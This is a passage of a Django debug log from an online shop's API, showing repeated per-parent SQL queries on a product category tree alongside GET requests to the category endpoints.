"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:45:11,197 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:45:11,199 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:45:11,203 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:45:11,206 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:45:11,208 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:45:11,211 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:45:11,213 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:45:11,216 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:45:11,220 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:45:11,222 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:45:11,224 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:45:11,226 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:45:11,229 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:45:11,232 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:45:11,235 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:45:11,237 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:45:11,240 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:45:11,243 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:45:11,250 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:45:11,254 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:45:11,258 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:45:11,260 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:45:11,263 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:45:11,265 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:45:11,269 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:45:11,271 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:45:11,274 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:45:11,277 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:45:11,280 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:45:11] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:45:11,420 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 13:45:11,426 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) [19/Dec/2019 13:45:11] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 13:45:12,334 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:45:12,340 utils 4252 140031503103744 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 15; args=(15,) DEBUG 2019-12-19 13:45:12,353 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:45:12,353 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:45:12,361 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) [19/Dec/2019 13:45:12] "GET /api/v1/categories/15 HTTP/1.0" 200 223 DEBUG 2019-12-19 13:45:12,368 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:45:12,374 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:45:12,377 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:45:12,380 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:45:12,384 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:45:12,387 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:45:12,392 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:45:12,395 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:45:12,398 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:45:12,401 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:45:12,406 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:45:12,414 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:45:12,418 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:45:12,424 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:45:12,431 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:45:12,438 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:45:12,448 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:45:12,455 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:45:12,460 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:45:12,463 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:45:12,466 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:45:12,469 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:45:12,474 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:45:12,476 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:45:12,479 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:45:12,482 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:45:12,485 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:45:12,489 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:45:12,492 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:45:12,495 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:45:12,498 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" 